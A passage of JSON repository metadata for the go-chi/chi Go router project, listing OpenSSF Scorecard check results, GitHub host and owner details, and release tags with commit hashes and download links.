patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/t